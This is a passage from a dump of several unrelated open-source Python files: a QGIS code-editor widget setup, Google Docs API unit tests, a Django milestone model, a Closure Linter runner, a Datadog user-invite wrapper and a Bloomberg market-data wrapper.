self.setFoldMarginColors(QColor('#d3d7cf'), QColor('#d3d7cf'))
# Mark column 80 with vertical line
self.setEdgeMode(QsciScintilla.EdgeLine)
self.setEdgeColumn(80)
self.setEdgeColor(QColor('#eeeeec'))
# Indentation
self.setAutoIndent(True)
self.setIndentationsUseTabs(False)
self.setIndentationWidth(4)
self.setTabIndents(True)
self.setBackspaceUnindents(True)
self.setTabWidth(4)
# Autocomletion
self.setAutoCompletionThreshold(2)
self.setAutoCompletionSource(QsciScintilla.AcsAPIs)
self.setFonts(10)
def setFonts(self, size):
# Load font from Python console settings
settings = QSettings()
fontName = settings.value('pythonConsole/fontfamilytext', 'Monospace')
fontSize = int(settings.value('pythonConsole/fontsize', size))
self.defaultFont = QFont(fontName)
self.defaultFont.setFixedPitch(True)
self.defaultFont.setPointSize(fontSize)
self.defaultFont.setStyleHint(QFont.TypeWriter)
self.defaultFont.setStretch(QFont.SemiCondensed)
self.defaultFont.setLetterSpacing(QFont.PercentageSpacing, 87.0)
self.defaultFont.setBold(False)
self.boldFont = QFont(self.defaultFont)
self.boldFont.setBold(True)
self.italicFont = QFont(self.defaultFont)
self.italicFont.setItalic(True)
self.setFont(self.defaultFont)
self.setMarginsFont(self.defaultFont)
def initShortcuts(self):
(ctrl, shift) = (self.SCMOD_CTRL << 16, self.SCMOD_SHIFT << 16)
# Disable some shortcuts
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('D') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl
+ shift)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('T') + ctrl)
#self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord("Z") + ctrl)
#self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord("Y") + ctrl)
# Use Ctrl+Space for autocompletion
self.shortcutAutocomplete = QShortcut(QKeySequence(Qt.CTRL
+ Qt.Key_Space), self)
self.shortcutAutocomplete.setContext(Qt.WidgetShortcut)
self.shortcutAutocomplete.activated.connect(self.autoComplete)
def autoComplete(self):
self.autoCompleteFromAll()
def setLexerType(self, lexerType):
self.lexerType = lexerType
self.initLexer()
def initLexer(self):
if self.lexerType == self.LEXER_PYTHON:
self.lexer = QsciLexerPython()
colorDefault = QColor('#2e3436')
colorComment = QColor('#c00')
colorCommentBlock = QColor('#3465a4')
colorNumber = QColor('#4e9a06')
colorType = QColor('#4e9a06')
colorKeyword = QColor('#204a87')
colorString = QColor('#ce5c00')
self.lexer.setDefaultFont(self.defaultFont)
self.lexer.setDefaultColor(colorDefault)
self.lexer.setColor(colorComment, 1)
self.lexer.setColor(colorNumber, 2)
self.lexer.setColor(colorString, 3)
self.lexer.setColor(colorString, 4)
self.lexer.setColor(colorKeyword, 5)
self.lexer.setColor(colorString, 6)
self.lexer.setColor(colorString, 7)
self.lexer.setColor(colorType, 8)
self.lexer.setColor(colorCommentBlock, 12)
self.lexer.setColor(colorString, 15)
self.lexer.setFont(self.italicFont, 1)
self.lexer.setFont(self.boldFont, 5)
self.lexer.setFont(self.boldFont, 8)
self.lexer.setFont(self.italicFont, 12)
self.api = QsciAPIs(self.lexer)
settings = QSettings()
useDefaultAPI = bool(settings.value('pythonConsole/preloadAPI',
True))
if useDefaultAPI:
# Load QGIS API shipped with Python console
self.api.loadPrepared(
os.path.join(QgsApplication.pkgDataPath(),
'python', 'qsci_apis', 'pyqgis.pap'))
else:
# Load user-defined API files
apiPaths = settings.value('pythonConsole/userAPI', [])
for path in apiPaths:
self.api.load(path)
self.api.prepare()
self.lexer.setAPIs(self.api)
elif self.lexerType == self.LEXER_R:
# R lexer
self.lexer = LexerR()
self.setLexer(self.lexer)
|
mkieszek/odoo
|
refs/heads/master
|
addons/website_portal_sale/__init__.py
|
1350
|
import controllers
|
vlachoudis/sl4a
|
refs/heads/master
|
python-build/python-libs/gdata/tests/gdata_tests/docs_test.py
|
89
|
#!/usr/bin/python
#
# Copyright (C) 2006 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = ('api.jfisher (Jeff Fisher), '
'api.eric@google.com (Eric Bidelman)')
import unittest
from gdata import test_data
import gdata.docs
class DocumentListEntryTest(unittest.TestCase):
def setUp(self):
self.dl_entry = gdata.docs.DocumentListEntryFromString(
test_data.DOCUMENT_LIST_ENTRY)
def testToAndFromStringWithData(self):
entry = gdata.docs.DocumentListEntryFromString(str(self.dl_entry))
self.assertEqual(entry.author[0].name.text, 'test.user')
self.assertEqual(entry.author[0].email.text, 'test.user@gmail.com')
self.assertEqual(entry.GetDocumentType(), 'spreadsheet')
self.assertEqual(entry.id.text,
'http://docs.google.com/feeds/documents/private/full/' +\
'spreadsheet%3Asupercalifragilisticexpealidocious')
self.assertEqual(entry.title.text,'Test Spreadsheet')
self.assertEqual(entry.resourceId.text,
'spreadsheet:supercalifragilisticexpealidocious')
self.assertEqual(entry.lastModifiedBy.name.text,'test.user')
self.assertEqual(entry.lastModifiedBy.email.text,'test.user@gmail.com')
self.assertEqual(entry.lastViewed.text,'2009-03-05T07:48:21.493Z')
self.assertEqual(entry.writersCanInvite.value, 'true')
class DocumentListFeedTest(unittest.TestCase):
def setUp(self):
self.dl_feed = gdata.docs.DocumentListFeedFromString(
test_data.DOCUMENT_LIST_FEED)
def testToAndFromString(self):
self.assert_(len(self.dl_feed.entry) == 2)
for an_entry in self.dl_feed.entry:
self.assert_(isinstance(an_entry, gdata.docs.DocumentListEntry))
new_dl_feed = gdata.docs.DocumentListFeedFromString(str(self.dl_feed))
for an_entry in new_dl_feed.entry:
self.assert_(isinstance(an_entry, gdata.docs.DocumentListEntry))
def testConvertActualData(self):
for an_entry in self.dl_feed.entry:
self.assertEqual(an_entry.author[0].name.text, 'test.user')
self.assertEqual(an_entry.author[0].email.text, 'test.user@gmail.com')
self.assertEqual(an_entry.lastModifiedBy.name.text, 'test.user')
self.assertEqual(an_entry.lastModifiedBy.email.text,
'test.user@gmail.com')
self.assertEqual(an_entry.lastViewed.text,'2009-03-05T07:48:21.493Z')
if(an_entry.GetDocumentType() == 'spreadsheet'):
self.assertEqual(an_entry.title.text, 'Test Spreadsheet')
self.assertEqual(an_entry.writersCanInvite.value, 'true')
elif(an_entry.GetDocumentType() == 'document'):
self.assertEqual(an_entry.title.text, 'Test Document')
self.assertEqual(an_entry.writersCanInvite.value, 'false')
def testLinkFinderFindsLinks(self):
for entry in self.dl_feed.entry:
# All Document List entries should have a self link
self.assert_(entry.GetSelfLink() is not None)
# All Document List entries should have an HTML link
self.assert_(entry.GetHtmlLink() is not None)
self.assert_(entry.feedLink.href is not None)
class DocumentListAclEntryTest(unittest.TestCase):
def setUp(self):
self.acl_entry = gdata.docs.DocumentListAclEntryFromString(
test_data.DOCUMENT_LIST_ACL_ENTRY)
def testToAndFromString(self):
self.assert_(isinstance(self.acl_entry, gdata.docs.DocumentListAclEntry))
self.assert_(isinstance(self.acl_entry.role, gdata.docs.Role))
self.assert_(isinstance(self.acl_entry.scope, gdata.docs.Scope))
self.assertEqual(self.acl_entry.scope.value, 'user@gmail.com')
self.assertEqual(self.acl_entry.scope.type, 'user')
self.assertEqual(self.acl_entry.role.value, 'writer')
acl_entry_str = str(self.acl_entry)
new_acl_entry = gdata.docs.DocumentListAclEntryFromString(acl_entry_str)
self.assert_(isinstance(new_acl_entry, gdata.docs.DocumentListAclEntry))
self.assert_(isinstance(new_acl_entry.role, gdata.docs.Role))
self.assert_(isinstance(new_acl_entry.scope, gdata.docs.Scope))
self.assertEqual(new_acl_entry.scope.value, self.acl_entry.scope.value)
self.assertEqual(new_acl_entry.scope.type, self.acl_entry.scope.type)
self.assertEqual(new_acl_entry.role.value, self.acl_entry.role.value)
def testCreateNewAclEntry(self):
cat = gdata.atom.Category(
term='http://schemas.google.com/acl/2007#accessRule',
scheme='http://schemas.google.com/g/2005#kind')
acl_entry = gdata.docs.DocumentListAclEntry(category=[cat])
acl_entry.scope = gdata.docs.Scope(value='user@gmail.com', type='user')
acl_entry.role = gdata.docs.Role(value='writer')
self.assert_(isinstance(acl_entry, gdata.docs.DocumentListAclEntry))
self.assert_(isinstance(acl_entry.role, gdata.docs.Role))
self.assert_(isinstance(acl_entry.scope, gdata.docs.Scope))
self.assertEqual(acl_entry.scope.value, 'user@gmail.com')
self.assertEqual(acl_entry.scope.type, 'user')
self.assertEqual(acl_entry.role.value, 'writer')
class DocumentListAclFeedTest(unittest.TestCase):
def setUp(self):
self.feed = gdata.docs.DocumentListAclFeedFromString(
test_data.DOCUMENT_LIST_ACL_FEED)
def testToAndFromString(self):
for entry in self.feed.entry:
self.assert_(isinstance(entry, gdata.docs.DocumentListAclEntry))
feed = gdata.docs.DocumentListAclFeedFromString(str(self.feed))
for entry in feed.entry:
self.assert_(isinstance(entry, gdata.docs.DocumentListAclEntry))
def testConvertActualData(self):
entries = self.feed.entry
self.assert_(len(entries) == 2)
self.assertEqual(entries[0].title.text,
'Document Permission - user@gmail.com')
self.assertEqual(entries[0].role.value, 'owner')
self.assertEqual(entries[0].scope.type, 'user')
self.assertEqual(entries[0].scope.value, 'user@gmail.com')
self.assert_(entries[0].GetSelfLink() is not None)
self.assert_(entries[0].GetEditLink() is not None)
self.assertEqual(entries[1].title.text,
'Document Permission - user2@google.com')
self.assertEqual(entries[1].role.value, 'writer')
self.assertEqual(entries[1].scope.type, 'domain')
self.assertEqual(entries[1].scope.value, 'google.com')
self.assert_(entries[1].GetSelfLink() is not None)
self.assert_(entries[1].GetEditLink() is not None)
if __name__ == '__main__':
unittest.main()
|
joaquimrocha/Rancho
|
refs/heads/master
|
rancho/milestone/models.py
|
1
|
########################################################################
# Rancho - Open Source Group/Project Management Tool
# Copyright (C) 2008 The Rancho Team
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
########################################################################
from datetime import date, datetime
from django.contrib.auth.models import User
from django.db import models
from rancho.project.models import Project
class MilestoneManager(models.Manager):
def get_late_milestones(self, project = None, order = '-due_date', user = None):
milestones = Milestone.objects.filter(completion_date = None).order_by(order)
if project:
milestones = milestones.filter(project = project).order_by(order)
if user:
milestones = milestones.filter(models.Q(responsible = user) | models.Q(responsible = None)).order_by(order)
return [milestone for milestone in milestones if milestone.is_late()]
def get_upcoming_milestones(self, project = None, order = 'due_date', user = None):
milestones = Milestone.objects.filter(completion_date = None).order_by(order)
if project:
milestones = milestones.filter(project = project).order_by(order)
if user:
milestones = milestones.filter(models.Q(responsible = user) | models.Q(responsible = None)).order_by(order)
return [milestone for milestone in milestones if milestone.is_upcoming()]
def get_complete_milestones(self, project = None, order = 'completion_date', user = None):
milestones = Milestone.objects.all().exclude(completion_date = None).order_by(order)
if project:
milestones = milestones.filter(project = project).order_by(order)
if user:
milestones = milestones.filter(models.Q(responsible = user) | models.Q(responsible = None)).order_by(order)
return milestones
class Milestone(models.Model):
creator = models.ForeignKey(User)
project = models.ForeignKey(Project)
#If null, all the project is responsible
responsible = models.ForeignKey(User, related_name='responsible', null=True)
title = models.CharField(max_length=500)
creation_date = models.DateTimeField(default = datetime.now())
due_date = models.DateTimeField()
send_notification_email = models.BooleanField()
completion_date = models.DateTimeField(null=True)
sent_notification = models.BooleanField(default=False)
objects = MilestoneManager()
@models.permalink
def get_absolute_url(self):
return ('rancho.milestone.views.edit', [], {'p_id': self.project.id, 'milestone_id':self.id})
def is_late(self):
return self.due_date.date() <= date.today() and \
not self.completion_date
def is_upcoming(self):
return self.due_date.date() > date.today() and \
not self.completion_date
def is_complete(self):
return self.completion_date != None
def get_status_name(self):
if self.is_late():
return 'late'
elif self.is_upcoming():
return 'upcoming'
else:
return 'complete'
def _get_todolist(self):
todolist_set = self.todo_milestone.all()
if todolist_set:
return todolist_set[0]
return None
todolist = property(_get_todolist)
|
jessekl/flixr
|
refs/heads/master
|
venv/lib/python2.7/site-packages/flask/testsuite/test_apps/config_module_app.py
|
1257
|
import os
import flask
here = os.path.abspath(os.path.dirname(__file__))
app = flask.Flask(__name__)
|
manelvf/closure-linter
|
refs/heads/master
|
closure_linter/runner.py
|
102
|
#!/usr/bin/env python
#
# Copyright 2012 The Closure Linter Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main lint function. Tokenizes file, runs passes, and feeds to checker."""
# Allow non-Google copyright
# pylint: disable=g-bad-file-header
__author__ = 'nnaze@google.com (Nathan Naze)'
import traceback
import gflags as flags
from closure_linter import checker
from closure_linter import ecmalintrules
from closure_linter import ecmametadatapass
from closure_linter import error_check
from closure_linter import errors
from closure_linter import javascriptstatetracker
from closure_linter import javascripttokenizer
from closure_linter.common import error
from closure_linter.common import htmlutil
from closure_linter.common import tokens
flags.DEFINE_list('limited_doc_files', ['dummy.js', 'externs.js'],
'List of files with relaxed documentation checks. Will not '
'report errors for missing documentation, some missing '
'descriptions, or methods whose @return tags don\'t have a '
'matching return statement.')
flags.DEFINE_boolean('error_trace', False,
'Whether to show error exceptions.')
flags.ADOPT_module_key_flags(checker)
flags.ADOPT_module_key_flags(ecmalintrules)
flags.ADOPT_module_key_flags(error_check)
def _GetLastNonWhiteSpaceToken(start_token):
"""Get the last non-whitespace token in a token stream."""
ret_token = None
whitespace_tokens = frozenset([
tokens.TokenType.WHITESPACE, tokens.TokenType.BLANK_LINE])
for t in start_token:
if t.type not in whitespace_tokens:
ret_token = t
return ret_token
def _IsHtml(filename):
return filename.endswith('.html') or filename.endswith('.htm')
def _Tokenize(fileobj):
"""Tokenize a file.
Args:
fileobj: file-like object (or iterable lines) with the source.
Returns:
The first token in the token stream and the ending mode of the tokenizer.
"""
tokenizer = javascripttokenizer.JavaScriptTokenizer()
start_token = tokenizer.TokenizeFile(fileobj)
return start_token, tokenizer.mode
def _IsLimitedDocCheck(filename, limited_doc_files):
"""Whether this this a limited-doc file.
Args:
filename: The filename.
limited_doc_files: Iterable of strings. Suffixes of filenames that should
be limited doc check.
Returns:
Whether the file should be limited check.
"""
for limited_doc_filename in limited_doc_files:
if filename.endswith(limited_doc_filename):
return True
return False
def Run(filename, error_handler, source=None):
"""Tokenize, run passes, and check the given file.
Args:
filename: The path of the file to check
error_handler: The error handler to report errors to.
source: A file-like object with the file source. If omitted, the file will
be read from the filename path.
"""
if not source:
try:
source = open(filename)
except IOError:
error_handler.HandleFile(filename, None)
error_handler.HandleError(
error.Error(errors.FILE_NOT_FOUND, 'File not found'))
error_handler.FinishFile()
return
if _IsHtml(filename):
source_file = htmlutil.GetScriptLines(source)
else:
source_file = source
token, tokenizer_mode = _Tokenize(source_file)
error_handler.HandleFile(filename, token)
# If we did not end in the basic mode, this a failed parse.
if tokenizer_mode is not javascripttokenizer.JavaScriptModes.TEXT_MODE:
error_handler.HandleError(
error.Error(errors.FILE_IN_BLOCK,
'File ended in mode "%s".' % tokenizer_mode,
_GetLastNonWhiteSpaceToken(token)))
# Run the ECMA pass
error_token = None
ecma_pass = ecmametadatapass.EcmaMetaDataPass()
error_token = RunMetaDataPass(token, ecma_pass, error_handler, filename)
is_limited_doc_check = (
_IsLimitedDocCheck(filename, flags.FLAGS.limited_doc_files))
_RunChecker(token, error_handler,
is_limited_doc_check,
is_html=_IsHtml(filename),
stop_token=error_token)
error_handler.FinishFile()
def RunMetaDataPass(start_token, metadata_pass, error_handler, filename=''):
"""Run a metadata pass over a token stream.
Args:
start_token: The first token in a token stream.
metadata_pass: Metadata pass to run.
error_handler: The error handler to report errors to.
filename: Filename of the source.
Returns:
The token where the error occurred (if any).
"""
try:
metadata_pass.Process(start_token)
except ecmametadatapass.ParseError, parse_err:
if flags.FLAGS.error_trace:
traceback.print_exc()
error_token = parse_err.token
error_msg = str(parse_err)
error_handler.HandleError(
error.Error(errors.FILE_DOES_NOT_PARSE,
('Error parsing file at token "%s". Unable to '
'check the rest of file.'
'\nError "%s"' % (error_token, error_msg)), error_token))
return error_token
except Exception: # pylint: disable=broad-except
traceback.print_exc()
error_handler.HandleError(
error.Error(
errors.FILE_DOES_NOT_PARSE,
'Internal error in %s' % filename))
def _RunChecker(start_token, error_handler,
limited_doc_checks, is_html,
stop_token=None):
state_tracker = javascriptstatetracker.JavaScriptStateTracker()
style_checker = checker.JavaScriptStyleChecker(
state_tracker=state_tracker,
error_handler=error_handler)
style_checker.Check(start_token,
is_html=is_html,
limited_doc_checks=limited_doc_checks,
stop_token=stop_token)
|
clokep/datadogpy
|
refs/heads/master
|
datadog/api/users.py
|
5
|
from datadog.api.base import ActionAPIResource
class User(ActionAPIResource):
"""
A wrapper around User HTTP API.
"""
@classmethod
def invite(cls, emails):
"""
Send an invite to join datadog to each of the email addresses in the
*emails* list. If *emails* is a string, it will be wrapped in a list and
sent. Returns a list of email addresses for which an email was sent.
:param emails: emails adresses to invite to join datadog
:type emails: string list
:returns: JSON response from HTTP request
"""
if not isinstance(emails, list):
emails = [emails]
body = {
'emails': emails,
}
return super(User, cls)._trigger_action('POST', '/invite_users', **body)
|
louisLouL/pair_trading
|
refs/heads/master
|
hist_data/blp/blp_api.py
|
1
|
"""
Python wrapper to download data through the Bloomberg Open API
Written by Alexandre Almosni alexandre.almosni@gmail.com
(C) 2014-2017 Alexandre Almosni
Released under Apache 2.0 license. More info at http://www.apache.org/licenses/LICENSE-2.0
"""
from __future__ import print_function
from abc import ABCMeta, abstractmethod
import blpapi
import datetime
import pandas
import threading
# This makes successive requests faster
DATE = blpapi.Name("date")
ERROR_INFO = blpapi.Name("errorInfo")
EVENT_TIME = blpapi.Name("EVENT_TIME")
FIELD_DATA = blpapi.Name("fieldData")
FIELD_EXCEPTIONS = blpapi.Name("fieldExceptions")
FIELD_ID = blpapi.Name("fieldId")
SECURITY = blpapi.Name("security")
SECURITY_DATA = blpapi.Name("securityData")
################################################
class BLP():
"""Naive implementation of the Request/Response Paradigm closely matching the Excel API.
Sharing one session for subsequent requests is faster, however it is not thread-safe, as some events can come faster than others.
bdp returns a string, bdh returns a pandas DataFrame.
This is mostly useful for scripting, but care should be taken when used in a real world application.
"""
def __init__(self):
self.session = blpapi.Session()
self.session.start()
self.session.openService('//BLP/refdata')
self.refDataSvc = self.session.getService('//BLP/refdata')
def bdp(self, strSecurity='US900123AL40 Govt', strData='PX_LAST', strOverrideField='', strOverrideValue=''):
request = self.refDataSvc.createRequest('ReferenceDataRequest')
request.append('securities', strSecurity)
request.append('fields', strData)
if strOverrideField != '':
o = request.getElement('overrides').appendElement()
o.setElement('fieldId', strOverrideField)
o.setElement('value', strOverrideValue)
requestID = self.session.sendRequest(request)
while True:
event = self.session.nextEvent()
if event.eventType() == blpapi.event.Event.RESPONSE:
break
try:
output = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).getValueAsElement(
0).getElement(FIELD_DATA).getElementAsString(strData)
if output == '#N/A':
output = pandas.np.nan
except:
print('error with ' + strSecurity + ' ' + strData)
output = pandas.np.nan
return output
def bdh(self, strSecurity='SPX Index', strData='PX_LAST', startdate=datetime.date(2014, 1, 1),
enddate=datetime.date(2014, 1, 9), adjustmentSplit=False, periodicity='DAILY'):
request = self.refDataSvc.createRequest('HistoricalDataRequest')
request.append('securities', strSecurity)
if type(strData) == str:
strData = [strData]
for strD in strData:
request.append('fields', strD)
request.set('startDate', startdate.strftime('%Y%m%d'))
request.set('endDate', enddate.strftime('%Y%m%d'))
request.set('adjustmentSplit', 'TRUE' if adjustmentSplit else 'FALSE')
request.set('periodicitySelection', periodicity)
requestID = self.session.sendRequest(request)
while True:
event = self.session.nextEvent()
if event.eventType() == blpapi.event.Event.RESPONSE:
break
fieldDataArray = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).getElement(FIELD_DATA)
fieldDataList = [fieldDataArray.getValueAsElement(i) for i in range(0, fieldDataArray.numValues())]
outDates = [x.getElementAsDatetime(DATE) for x in fieldDataList]
output = pandas.DataFrame(index=outDates, columns=strData)
for strD in strData:
output[strD] = [x.getElementAsFloat(strD) for x in fieldDataList]
output.replace('#N/A History', pandas.np.nan, inplace=True)
output.index = pandas.to_datetime(output.index)
return output
def bdhOHLC(self, strSecurity='SPX Index', startdate=datetime.date(2014, 1, 1), enddate=datetime.date(2014, 1, 9),
periodicity='DAILY'):
return self.bdh(strSecurity, ['PX_OPEN', 'PX_HIGH', 'PX_LOW', 'PX_LAST'], startdate, enddate, periodicity)
def closeSession(self):
self.session.stop()
################################################
class BLPTS():
"""Thread-safe implementation of the Request/Response Paradigm.
The functions don't return anything but notify observers of results.
Including startDate as a keyword argument will define a HistoricalDataRequest, otherwise it will be a ReferenceDataRequest.
HistoricalDataRequest sends observers a pandas DataFrame, whereas ReferenceDataRequest sends a pandas Series.
Override seems to only work when there's one security, one field, and one override.
Examples:
BLPTS(['ESA Index', 'VGA Index'], ['BID', 'ASK'])
BLPTS('US900123AL40 Govt','YLD_YTM_BID',strOverrideField='PX_BID',strOverrideValue='200')
BLPTS(['SPX Index','SX5E Index','EUR Curncy'],['PX_LAST','VOLUME'],startDate=datetime.datetime(2014,1,1),endDate=datetime.datetime(2015,5,14),periodicity='DAILY')
"""
def __init__(self, securities=[], fields=[], **kwargs):
"""
Keyword arguments:
securities : list of ISINS
fields : list of fields
kwargs : startDate and endDate (datetime.datetime object, note: hours, minutes, seconds, and microseconds must be replaced by 0)
"""
self.session = blpapi.Session()
self.session.start()
self.session.openService('//BLP/refdata')
self.refDataSvc = self.session.getService('//BLP/refdata')
self.observers = []
self.kwargs = kwargs
if len(securities) > 0 and len(fields) > 0:
# also works if securities and fields are a string
self.fillRequest(securities, fields, **kwargs)
def fillRequest(self, securities, fields, **kwargs):
"""
keyword arguments:
securities : list of ISINS
fields : list of fields
kwargs : startDate and endDate (datetime.datetime object, note: hours, minutes, seconds, and microseconds must be replaced by 0)
"""
self.kwargs = kwargs
if type(securities) == str:
securities = [securities]
if type(fields) == str:
fields = [fields]
if 'startDate' in kwargs:
self.request = self.refDataSvc.createRequest('HistoricalDataRequest')
self.startDate = kwargs['startDate']
self.endDate = kwargs['endDate']
if 'periodicity' in kwargs:
self.periodicity = kwargs['periodicity']
else:
self.periodicity = 'DAILY'
self.request.set('startDate', self.startDate.strftime('%Y%m%d'))
self.request.set('endDate', self.endDate.strftime('%Y%m%d'))
self.request.set('periodicitySelection', self.periodicity)
else:
self.request = self.refDataSvc.createRequest('ReferenceDataRequest')
self.output = pandas.DataFrame(index=securities, columns=fields)
if 'strOverrideField' in kwargs:
o = self.request.getElement('overrides').appendElement()
o.setElement('fieldId', kwargs['strOverrideField'])
o.setElement('value', kwargs['strOverrideValue'])
self.securities = securities
self.fields = fields
for s in securities:
self.request.append('securities', s)
for f in fields:
self.request.append('fields', f)
def get(self, newSecurities=[], newFields=[], **kwargs):
"""
securities : list of ISINS
fields : list of fields
kwargs : startDate and endDate (datetime.datetime object, note: hours, minutes, seconds, and microseconds must be replaced by 0)
"""
if len(newSecurities) > 0 or len(newFields) > 0:
self.fillRequest(newSecurities, newFields, **kwargs)
self.requestID = self.session.sendRequest(self.request)
while True:
event = self.session.nextEvent()
if event.eventType() in [blpapi.event.Event.RESPONSE, blpapi.event.Event.PARTIAL_RESPONSE]:
responseSize = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).numValues()
for i in range(0, responseSize):
if 'startDate' in self.kwargs:
# HistoricalDataRequest
output = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA)
security = output.getElement(SECURITY).getValueAsString()
fieldDataArray = output.getElement(FIELD_DATA)
fieldDataList = [fieldDataArray.getValueAsElement(i) for i in
range(0, fieldDataArray.numValues())]
dates = map(lambda x: x.getElement(DATE).getValueAsString(), fieldDataList)
outDF = pandas.DataFrame(index=dates, columns=self.fields)
outDF.index = pandas.to_datetime(outDF.index)
for field in self.fields:
data = []
for row in fieldDataList:
if row.hasElement(field):
data.append(row.getElement(field).getValueAsFloat())
else:
data.append(pandas.np.nan)
outDF[field] = data
self.updateObservers(security=security, field=field,
data=outDF) # update one security one field
self.updateObservers(security=security, field='ALL',
data=outDF) # update one security all fields
else:
# ReferenceDataRequest
output = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).getValueAsElement(
i)
n_elmts = output.getElement(FIELD_DATA).numElements()
security = output.getElement(SECURITY).getValueAsString()
for j in range(0, n_elmts):
data = output.getElement(FIELD_DATA).getElement(j)
field = str(data.name())
outData = _dict_from_element(data)
self.updateObservers(security=security, field=field,
data=outData) # update one security one field
self.output.loc[security, field] = outData
if n_elmts > 0:
self.updateObservers(security=security, field='ALL',
data=self.output.loc[security]) # update one security all fields
else:
print('Empty response received for ' + security)
if event.eventType() == blpapi.event.Event.RESPONSE:
break
def register(self, observer):
if not observer in self.observers:
self.observers.append(observer)
def unregister(self, observer):
if observer in self.observers:
self.observers.remove(observer)
def unregisterAll(self):
if self.observers:
del self.observers[:]
def updateObservers(self, *args, **kwargs):
for observer in self.observers:
observer.update(*args, **kwargs)
def closeSession(self):
self.session.stop()
################################################
class BLPStream(threading.Thread):
"""The Subscription Paradigm
The subscribed data will be sitting in self.output and update automatically. Observers will be notified.
floatInterval is the minimum amount of time before updates - sometimes needs to be set at 0 for things to work properly. In seconds.
intCorrID is a user defined ID for the request
It is sometimes safer to ask for each data (for instance BID and ASK) in a separate stream.
Note that for corporate bonds, a change in the ASK price will still trigger a BID event.
"""
def __init__(self, strSecurityList=['ESM5 Index', 'VGM5 Index'], strDataList=['BID', 'ASK'], floatInterval=0,
intCorrIDList=[0, 1]):
threading.Thread.__init__(self)
self.session = blpapi.Session()
self.session.start()
self.session.openService("//BLP/mktdata")
if type(strSecurityList) == str:
strSecurityList = [strSecurityList]
if type(intCorrIDList) == int:
intCorrIDList = [intCorrIDList]
if type(strDataList) == str:
strDataList = [strDataList]
self.strSecurityList = strSecurityList
self.strDataList = strDataList
if len(strSecurityList) != len(intCorrIDList):
print('Number of securities needs to match number of Correlation IDs, overwriting IDs')
self.intCorrIDList = range(0, len(strSecurityList))
else:
self.intCorrIDList = intCorrIDList
self.subscriptionList = blpapi.subscriptionlist.SubscriptionList()
for (security, intCorrID) in zip(self.strSecurityList, self.intCorrIDList):
self.subscriptionList.add(security, self.strDataList, "interval=" + str(floatInterval),
blpapi.CorrelationId(intCorrID))
self.output = pandas.DataFrame(index=self.strSecurityList, columns=self.strDataList)
self.dictCorrID = dict(zip(self.intCorrIDList, self.strSecurityList))
self.lastUpdateTimeBlmbrg = '' # Warning - if you mix live_stream and delayed data you could have non increasing data
self.lastUpdateTime = datetime.datetime(1900, 1, 1)
self.observers = []
def register(self, observer):
if not observer in self.observers:
self.observers.append(observer)
def unregister(self, observer):
if observer in self.observers:
self.observers.remove(observer)
def unregisterAll(self):
if self.observers:
del self.observers[:]
def updateObservers(self, *args, **kwargs):
for observer in self.observers:
observer.update(*args, **kwargs)
def run(self, verbose=False):
self.session.subscribe(self.subscriptionList)
while True:
event = self.session.nextEvent()
if event.eventType() == blpapi.event.Event.SUBSCRIPTION_DATA:
self.handleDataEvent(event)
else:
if verbose:
self.handleOtherEvent(event)
def handleDataEvent(self, event):
output = blpapi.event.MessageIterator(event).next()
self.lastUpdateTime = datetime.datetime.now()
corrID = output.correlationIds()[0].value()
security = self.dictCorrID[corrID]
isParsed = False
# print(output.toString())
if output.hasElement(EVENT_TIME):
self.lastUpdateTimeBlmbrg = output.getElement(EVENT_TIME).toString()
for field in self.strDataList:
if output.hasElement(field):
isParsed = True
try:
data = output.getElement(field).getValueAsFloat()
except:
data = pandas.np.nan
print('error: ', security,
field) # ,output.getElement(field).getValueAsString() # this can still error if field is there but is empty
self.output.loc[security, field] = data
self.updateObservers(time=self.lastUpdateTime, security=security, field=field, corrID=corrID, data=data,
bbgTime=self.lastUpdateTimeBlmbrg)
# It can happen that you get an event without the data behind the event!
self.updateObservers(time=self.lastUpdateTime, security=security, field='ALL', corrID=corrID, data=0,
bbgTime=self.lastUpdateTimeBlmbrg)
# if not isParsed:
# print(output.toString())
def handleOtherEvent(self, event):
output = blpapi.event.MessageIterator(event).next()
msg = output.toString()
if event.eventType() == blpapi.event.Event.AUTHORIZATION_STATUS:
print("Authorization event: " + msg)
elif event.eventType() == blpapi.event.Event.SUBSCRIPTION_STATUS:
print("Subscription status event: " + msg)
else:
print("Other event: event " + str(event.eventType()))
def closeSubscription(self):
self.session.unsubscribe(self.subscriptionList)
################################################
# Convenience functions below####################
################################################
def _dict_from_element(element):
'''
Used for e.g. dividends
'''
try:
return element.getValueAsString()
except:
if element.numValues() > 1:
results = []
for i in range(0, element.numValues()):
subelement = element.getValue(i)
name = str(subelement.name())
results.append(_dict_from_element(subelement))
else:
results = {}
